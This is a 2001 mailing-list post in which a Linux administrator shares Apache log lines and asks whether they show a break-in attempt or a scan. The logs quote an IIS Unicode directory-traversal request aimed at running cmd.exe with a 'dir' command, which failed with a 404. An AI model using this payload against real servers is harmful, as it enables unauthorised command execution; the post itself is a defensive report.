I was wondering if this is an attempt at break in or just a scan? This
person has run this on two separate occasions. Looks like they are
trying to do something to an NT server. Doesn't do them much good on a
Linux box;)
oz:/var/log# grep /scripts/ httpd/*
httpd/access_log:128.242.217.204 - - [23/May/2001:22:46:40 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328
httpd/error_log:[Wed May 23 22:46:40 2001] [error] [client
128.242.217.204] File does not exist: /home/httpd/html/scripts/..À¯..À¯..À¯..
À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
Thanks,
kent
--
From seeing and seeing the seeing has become so exhausted
First line of "The Panther" - R. M. Rilke
_______________________________________________
techtalk mailing list
[EMAIL PROTECTED]
http://www.linux.org.uk/mailman/listinfo/techtalk
